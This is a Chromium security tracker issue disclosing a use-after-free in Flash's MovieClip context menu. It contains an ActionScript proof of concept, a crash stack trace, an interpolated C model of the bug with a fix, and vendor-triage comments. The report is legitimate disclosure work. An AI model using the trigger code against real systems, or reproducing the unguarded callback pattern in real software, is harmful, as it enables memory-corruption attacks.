Security: Adobe Flash Context Menu Use After Free
Reported by
xiong12...@gmail.com,
Dec 23 2016
Issue description
VULNERABILITY DETAILS
Adobe Flash Context Menu Use After Free
VERSION
Chrome Version: 56.0.2924.28 beta (64-bit)
Operating System: Windows 7 en 64-bit
REPRODUCTION CASE
Open "TestContextMenu.html" with Chrome.
Right-click the mouse, then observe Chrome crash.
This is a use-after-free bug when using the context menu in Flash.
When we set MovieClip.menu, the menu parameter will be converted to an object.
If the menu is not an object, we can trigger a user-defined callback function.
If we remove the MovieClip in the callback, a use-after-free occurs.
// PoC (ActionScript 2) from the report
var mc = this.createEmptyMovieClip("mc", 0);

// Overriding the global Number constructor means the runtime's
// number-to-object conversion calls back into user script.
_global["Number"] = function() {
    trace(123);
    // Remove the clip whose .menu property is being set
    _root.removeMovieClip.call(mc);
    this.onSelect = function() {
        trace(233);
    }
}

// A non-object menu value is converted to an object, which runs the
// overridden Number constructor above.
mc.menu = 111;

// Define a getter for _level0 that returns the clip.
_root.addProperty('_level0', function() {
    trace(1);
    return mc;
}, function() {});
FOR CRASHES, PLEASE INCLUDE THE FOLLOWING ADDITIONAL INFORMATION
Type of crash: tab
Crash State:
(1774.1444): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
00000000`00000000 ?? ???
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Users\yuki\AppData\Local\Google\Chrome\User Data\PepperFlash\24.0.0.186\pepflashplayer.dll -
8:097> k
Child-SP RetAddr Call Site
00000000`0013e068 000007fe`d6208f20 0x0
00000000`0013e070 000007fe`d62e27f5 pepflashplayer!PPP_ShutdownBroker+0x204790
00000000`0013e0a0 000007fe`d6204d7e pepflashplayer!PPP_ShutdownBroker+0x2de065
00000000`0013e0d0 000007fe`d621638a pepflashplayer!PPP_ShutdownBroker+0x2005ee
00000000`0013e200 000007fe`d6015e05 pepflashplayer!PPP_ShutdownBroker+0x211bfa
00000000`0013e300 000007fe`d60142a4 pepflashplayer!PPP_ShutdownBroker+0x11675
00000000`0013e340 000007fe`d6019176 pepflashplayer!PPP_ShutdownBroker+0xfb14
00000000`0013e5f0 000007fe`d601942f pepflashplayer!PPP_ShutdownBroker+0x149e6
00000000`0013e660 000007fe`d60196dc pepflashplayer!PPP_ShutdownBroker+0x14c9f
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files (x86)\Google\Chrome\Application\56.0.2924.28\chrome_child.dll -
00000000`0013e690 000007fe`d97c7950 pepflashplayer!PPP_ShutdownBroker+0x14f4c
00000000`0013e6c0 000007fe`d97c7ce1 chrome_child!IsSandboxedProcess+0x20970
00000000`0013e6f0 000007fe`d97c7ebe chrome_child!IsSandboxedProcess+0x20d01
00000000`0013e790 000007fe`d97af728 chrome_child!IsSandboxedProcess+0x20ede
00000000`0013e7e0 000007fe`d97afff6 chrome_child!IsSandboxedProcess+0x8748
00000000`0013e810 000007fe`d7f450c0 chrome_child!IsSandboxedProcess+0x9016
00000000`0013e840 000007fe`d7f4503e chrome_child!ovly_debug_event+0x157d0
00000000`0013e870 000007fe`d7f47094 chrome_child!ovly_debug_event+0x1574e
00000000`0013e970 000007fe`d7f459ef chrome_child!ovly_debug_event+0x177a4
00000000`0013ea90 000007fe`d7f44a89 chrome_child!ovly_debug_event+0x160ff
00000000`0013ee80 000007fe`d8330f37 chrome_child!ovly_debug_event+0x15199
Credit:
Please credit "Yuki Chen of Qihoo 360 Vulcan Team" for this bug.
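The re-entrancy pattern behind the report, modelled in C as an added illustration (this is not Flash Player code and not the reporter's PoC; the MovieClip layout, the refcount, the `live` flag and the `to_object` callback are all constructed for the example). A native setter converts its argument to an object, the conversion runs script because the Number constructor was overridden, and that script removes the clip whose property is being set. The vulnerable setter writes into the clip afterwards without rechecking; the hardened setter holds its own reference across the callback and re-validates the target. The retain-and-recheck fix is the generic pattern for this bug class, not the mitigation Adobe is reported in this thread to have shipped.

```c
#include <stdio.h>
#include <stdlib.h>

/* Constructed model of an AS2 MovieClip as the host runtime sees it. */
typedef struct MovieClip {
    int refcount;   /* references held by the display list and by native code */
    int removed;    /* removeMovieClip() has run; the clip must not be used */
    int live;       /* 0 once storage is released (simulated free, see mc_release) */
    void *menu;     /* the object stored by the .menu setter */
} MovieClip;

/* Script that may run while a native setter is in the middle of its work. */
typedef void (*ScriptCallback)(MovieClip *target);

static int boxed_number_storage;   /* stands in for the Number object created by conversion */

MovieClip *mc_create(void) {
    MovieClip *mc = calloc(1, sizeof *mc);
    if (!mc) abort();
    mc->refcount = 1;   /* held by the display list */
    mc->live = 1;
    return mc;
}

void mc_retain(MovieClip *mc) { mc->refcount++; }

/* Drops a reference. At zero the object is "freed": a real runtime returns the
 * memory to the heap; here the block is kept and marked dead so the dangling
 * write can be observed instead of becoming undefined behaviour. */
void mc_release(MovieClip *mc) {
    if (--mc->refcount == 0) {
        mc->live = 0;
        mc->menu = NULL;
    }
}

/* The attacker's overridden Number constructor from the PoC: runs during
 * conversion and removes the clip whose .menu is being set. */
void script_remove_movieclip(MovieClip *target) {
    target->removed = 1;
    mc_release(target);   /* the display list drops its reference */
}

/* Converting a non-object value to an object goes through the script-visible
 * Number constructor, so user code runs here (hypothetical signature). */
void *to_object(int value, ScriptCallback number_ctor, MovieClip *target) {
    boxed_number_storage = value;
    if (number_ctor) number_ctor(target);
    return &boxed_number_storage;
}

/* Vulnerable setter: converts, then writes into mc without rechecking whether
 * the conversion callback removed it. Returns 1 if the write went to released
 * storage (the use-after-free), 0 otherwise. Reading mc->live after the write
 * is only possible because the simulation keeps the block around. */
int set_menu_vulnerable(MovieClip *mc, int value, ScriptCallback number_ctor) {
    void *obj = to_object(value, number_ctor, mc);
    mc->menu = obj;            /* dangling write when the callback released mc */
    return mc->live ? 0 : 1;
}

/* Hardened setter: holds its own reference across the callback and re-validates
 * the target afterwards. Returns 1 if the menu was stored, 0 if the clip was
 * removed during conversion and the write was skipped. */
int set_menu_fixed(MovieClip *mc, int value, ScriptCallback number_ctor) {
    int stored = 0;
    mc_retain(mc);                               /* keep mc alive while script runs */
    void *obj = to_object(value, number_ctor, mc);
    if (!mc->removed) {
        mc->menu = obj;
        stored = 1;
    }
    mc_release(mc);                              /* storage may go away now, after the last use */
    return stored;
}

int main(void) {
    MovieClip *a = mc_create();
    printf("vulnerable setter wrote to released storage: %d\n",
           set_menu_vulnerable(a, 111, script_remove_movieclip));
    MovieClip *b = mc_create();
    printf("fixed setter stored menu on removed clip: %d\n",
           set_menu_fixed(b, 111, script_remove_movieclip));
    return 0;
}
```

The order of operations in `set_menu_fixed` is the whole point: the extra reference guarantees that `mc` cannot reach refcount zero inside `to_object`, and the `removed` check afterwards ensures the setter does not store state on a clip that script has already torn down. Any native code path that calls back into script between looking up an object and using it needs the same two steps.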
Feb 15 2017
Hello, has this one been reported to Adobe? Thank you!
Feb 15 2017
This is PSIRT-6397
Apr 10 2017
According to Adobe, this is also CVE-2017-3001
Apr 11 2017
They are apparently different vulnerabilities. Disappointed in adobe security.
Apr 11 2017
Can you provide more details? If you feel they are different, I can take it up with Adobe. Was it fixed in the March update like they say?
Apr 11 2017
@natalie Really appreciate your help. I attached one of the vulnerabilities which they said is "CVE-2017-3001". This is a use-after-free caused by the AS2 delete2 action; we need to manually modify the byte code to trigger this UAF. And this bug, the context menu UAF, is a UAF when converting the context menu to an object. The two bugs are in different modules, caused by different callbacks. It seems Adobe disabled the destructor function call of AS2 MovieClip objects in the March update, so all MovieClip UAFs will not crash any more in this version. I guess they hadn't even carefully looked into the details of these issues, just tested them on this version, saw no crashes any more, and said they are duplicate bugs.
Apr 11 2017
Does removing the destructor from Movie Clip fix this issue? Or does it just cause it not to crash?
Apr 11 2017
Yes, this issue is fixed by the mitigation. Actually, all UAFs in the AS2 MovieClip object are fixed by this mitigation.
Feb 16 2018
This bug has been closed for more than 14 weeks. Removing security view restrictions. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Comment 1 by aarya@google.com, Dec 24 2016
Owner: natashenka@google.com
Status: ExternalDependency (was: Unconfirmed)